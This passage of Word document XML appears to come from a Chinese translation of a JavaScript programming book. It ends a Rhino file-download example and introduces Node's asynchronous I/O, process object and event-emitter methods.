      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(len){//</w:t>
      </w:r>
      <w:r>
        <w:t>如果长度已知，那么</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>bar.maximum=len;//</w:t>
      </w:r>
      <w:r>
        <w:t>设置进度条展示</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>bar.indeterminate=false;//</w:t>
      </w:r>
      <w:r>
        <w:t>下载的百分比</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>得到输入和输出流</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var input=conn.inputStream;//</w:t>
      </w:r>
      <w:r>
        <w:t>从服务器读取字节</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var output=new FileOutputStream(file);//</w:t>
      </w:r>
      <w:r>
        <w:t>把字节写入文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>创建</w:t>
      </w:r>
      <w:r>
        <w:t>4KB</w:t>
      </w:r>
      <w:r>
        <w:t>的数组作为输入缓冲区</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var buffer=java.lang.reflect.Array.newInstance(java.lang.Byte.TYPE,4096);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var num;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>while((num=inpu</w:t>
      </w:r>
      <w:r>
        <w:t>t.read(buffer))!=-1){//</w:t>
      </w:r>
      <w:r>
        <w:t>读取然后循环至</w:t>
      </w:r>
      <w:r>
        <w:t>EOF</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>output.write(buffer,0,num);//</w:t>
      </w:r>
      <w:r>
        <w:t>把字节写入文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>bar.value+=num;//</w:t>
      </w:r>
      <w:r>
        <w:t>更新进度条</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>output.close();//</w:t>
      </w:r>
      <w:r>
        <w:t>完成后关闭流</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>input.close();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>catch(e){//</w:t>
      </w:r>
      <w:r>
        <w:t>如果发生错误，在进度条上显示错误</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(bar){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>bar.indeterminate=false;//</w:t>
      </w:r>
      <w:r>
        <w:t>停止动画</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>bar.string=e.toString();//</w:t>
      </w:r>
      <w:r>
        <w:t>用错误取代文件名</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297" w:name="12_2_Yong_NodeShi_Xian_Yi_Bu_I_O"/>
      <w:r>
        <w:t>12.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　用</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>实现异步</w:t>
      </w:r>
      <w:r>
        <w:t>I/O</w:t>
      </w:r>
      <w:bookmarkEnd w:id="297"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>是基于</w:t>
      </w:r>
      <w:r>
        <w:t>C++</w:t>
      </w:r>
      <w:r>
        <w:t>的高速</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>解释器，绑定了用于进程、文件和网络套接字等底层</w:t>
      </w:r>
      <w:r>
        <w:t>Unix API</w:t>
      </w:r>
      <w:r>
        <w:t>，还绑定了</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>客户端和服务器</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>。除了一些专门命名的同步方法外，</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>的绑定都是异步的，且</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>程序默认绝不阻塞，这意味着它们通常具备强大的可伸缩能力并能有效地处理高负荷。由于</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>是异步的，因此</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>依赖事件处理程序，其通常使用嵌套函数和闭包来实现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[3]</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>本节重点介绍</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>部分最重要的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>和事件，但这些文档并不完整。请到</w:t>
      </w:r>
      <w:r>
        <w:t>http://nodejs</w:t>
      </w:r>
      <w:r>
        <w:t>.org/api/</w:t>
      </w:r>
      <w:r>
        <w:t>查看</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>的联机文档</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[4]</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para07"/>
      </w:pPr>
      <w:r>
        <w:t>获得</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>是免费软件，可以从</w:t>
      </w:r>
      <w:r>
        <w:t>http://nodejs.org</w:t>
      </w:r>
      <w:r>
        <w:t>上下载。在写本章时，</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>依旧处于活跃开发期，不过尚无二进制版本</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>你必须自己获取并编译源码。本节的例子是在</w:t>
      </w:r>
      <w:r>
        <w:t>Node 0.4</w:t>
      </w:r>
      <w:r>
        <w:t>版本下编写和测试的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[5]</w:t>
      </w:r>
      <w:r>
        <w:t>。这些</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>尚未完全确定，但这里介绍的基本原则在未来不会有太多改变。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>是在</w:t>
      </w:r>
      <w:r>
        <w:t>Google</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>V8 JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>引擎上构建而成。</w:t>
      </w:r>
      <w:r>
        <w:t>Node 0.4</w:t>
      </w:r>
      <w:r>
        <w:t>使用的是</w:t>
      </w:r>
      <w:r>
        <w:t>V8</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>3.1</w:t>
      </w:r>
      <w:r>
        <w:t>版本，它实现了除严格模式之外的全部</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>下</w:t>
      </w:r>
      <w:r>
        <w:t>载、编译并安装</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>后，可以使用如下命令运行</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>程序：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>node program.js</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>我们之前从</w:t>
      </w:r>
      <w:r>
        <w:t>print()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>load()</w:t>
      </w:r>
      <w:r>
        <w:t>函数开始介绍</w:t>
      </w:r>
      <w:r>
        <w:t>Rhino</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>也有类似函数，只是名字不同：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//Node</w:t>
      </w:r>
      <w:r>
        <w:t>定义了</w:t>
      </w:r>
      <w:r>
        <w:t>console.log()</w:t>
      </w:r>
      <w:r>
        <w:t>，可以像在浏览器中那样调试代码输出</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>console.log("Hello Node");//</w:t>
      </w:r>
      <w:r>
        <w:t>调试输出到控制台</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>require()</w:t>
      </w:r>
      <w:r>
        <w:t>替代</w:t>
      </w:r>
      <w:r>
        <w:t>load()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>它加载并执行（只有一次）命名模块，返回包含其导出标识符（</w:t>
      </w:r>
      <w:r>
        <w:t>exported symbol</w:t>
      </w:r>
      <w:r>
        <w:t>）的对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">var </w:t>
      </w:r>
      <w:r>
        <w:t>fs=require("fs");//</w:t>
      </w:r>
      <w:r>
        <w:t>加载</w:t>
      </w:r>
      <w:r>
        <w:t>"fs"</w:t>
      </w:r>
      <w:r>
        <w:t>模块，并返回其</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>在其全局对象中实现了所有标准的</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数、属性和函数。除此之外，它也支持客户端的计时器函数集</w:t>
      </w:r>
      <w:r>
        <w:t>setTimeout()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>setInterval()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>clearTimeout()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>clearInterval()</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//1</w:t>
      </w:r>
      <w:r>
        <w:t>秒钟后输出</w:t>
      </w:r>
      <w:r>
        <w:t>"Hello World"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>setTimeout(function(){console.log("Hello World");},1000);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>客户端的全局函数将在</w:t>
      </w:r>
      <w:r>
        <w:t>14.1</w:t>
      </w:r>
      <w:r>
        <w:t>节</w:t>
      </w:r>
      <w:r>
        <w:t>介绍。</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>的实现与</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器的实现兼容。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>process</w:t>
      </w:r>
      <w:r>
        <w:t>名字空间中定义了其他重要的全局属性。这里有该对象的一些属性：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>process.version//Node</w:t>
      </w:r>
      <w:r>
        <w:t>的版本字符串信息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>process.argv//"node"</w:t>
      </w:r>
      <w:r>
        <w:t>命令行的数组参数，</w:t>
      </w:r>
      <w:r>
        <w:t>argv[0]</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>"node"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>process.env//</w:t>
      </w:r>
      <w:r>
        <w:t>环境变量对象。例如</w:t>
      </w:r>
      <w:r>
        <w:t>:process.env.PATH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>process.pid//</w:t>
      </w:r>
      <w:r>
        <w:t>进程</w:t>
      </w:r>
      <w:r>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>process.getuid()//</w:t>
      </w:r>
      <w:r>
        <w:t>返回用户</w:t>
      </w:r>
      <w:r>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>process.cwd()//</w:t>
      </w:r>
      <w:r>
        <w:t>返回当前的工作目录</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>process.chdir()//</w:t>
      </w:r>
      <w:r>
        <w:t>改变目录</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>process.exit()//</w:t>
      </w:r>
      <w:r>
        <w:t>退出（运行</w:t>
      </w:r>
      <w:r>
        <w:t>shutdown</w:t>
      </w:r>
      <w:r>
        <w:t>命令之后）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>由于</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>的函数和方法都是异步的，因此当它们等待运算完成时并不产生阻塞。非阻塞方法的返回值无法返回异步运算的结果给你。如果想获取结果，或想知道完成运算的时间，当结果准备好或</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>完成运算（或发生错误）时，就必须提供</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>能调用的一个函数。在某些情况下（如在调用前面出现的</w:t>
      </w:r>
      <w:r>
        <w:t>setTimeout()</w:t>
      </w:r>
      <w:r>
        <w:t>时），只须简单地把函数作为参数传入，</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>会适时调用它。在另外一些情况下，则可以利用</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>的事件机制</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>对象产生事件（称为事件触发器（</w:t>
      </w:r>
      <w:r>
        <w:t>event emitter</w:t>
      </w:r>
      <w:r>
        <w:t>））定义</w:t>
      </w:r>
      <w:r>
        <w:t>on()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来注册处理程序。当传入参数时，将事件类型（一个字符串）作为第一参数，处理程序函数作为第二参数。不同的事件类型传递给处理程序函数的参数不同，你可能需要查阅</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>文档从而确切了解如何编写处理程序：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>emitter.on(name,f)//emitter</w:t>
      </w:r>
      <w:r>
        <w:t>注册</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>函数处理</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>事件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>emitter.addListener(name,f)//addLinstener()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>on()</w:t>
      </w:r>
      <w:r>
        <w:t>是同一个方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>emitter.once(name,f</w:t>
      </w:r>
      <w:r>
        <w:t>)//</w:t>
      </w:r>
      <w:r>
        <w:t>只执行一次，然后</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>会自动删除</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>emitter.listeners(name)//</w:t>
      </w:r>
      <w:r>
        <w:t>返回事件处理函数组成的数组</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>emitter.removeListener(name,f)//</w:t>
      </w:r>
      <w:r>
        <w:t>注销事件处理程序</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>emitter.removeAllListeners(name)//</w:t>
      </w:r>
      <w:r>
        <w:t>移除</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>事件的所有处理程序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>前面介绍的</w:t>
      </w:r>
      <w:r>
        <w:t>process</w:t>
      </w:r>
      <w:r>
        <w:t>对象是一个事件触发器，这里是其部分事件的处理程序示例：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//"exit"</w:t>
      </w:r>
      <w:r>
        <w:t>事件在</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>退出之前发送</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>process.on("exit",function(){console.log("G</w:t>
      </w:r>
      <w:r>
        <w:t>oodbye");});//</w:t>
      </w:r>
      <w:r>
        <w:t>如果注册了任何事件处理程序，非捕获异常都会产生事件，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>否则，异常仅会使</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>输出错误然后退出</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>process.on("uncaughtException",function(e){console.log(Exception,e);});//POSIX</w:t>
      </w:r>
      <w:r>
        <w:t>中诸如</w:t>
      </w:r>
      <w:r>
        <w:t>SIGINT</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>SIGHUP</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>SIGTERM</w:t>
      </w:r>
      <w:r>
        <w:t>等信号产生事件</w:t>
      </w:r>
    </w:p>
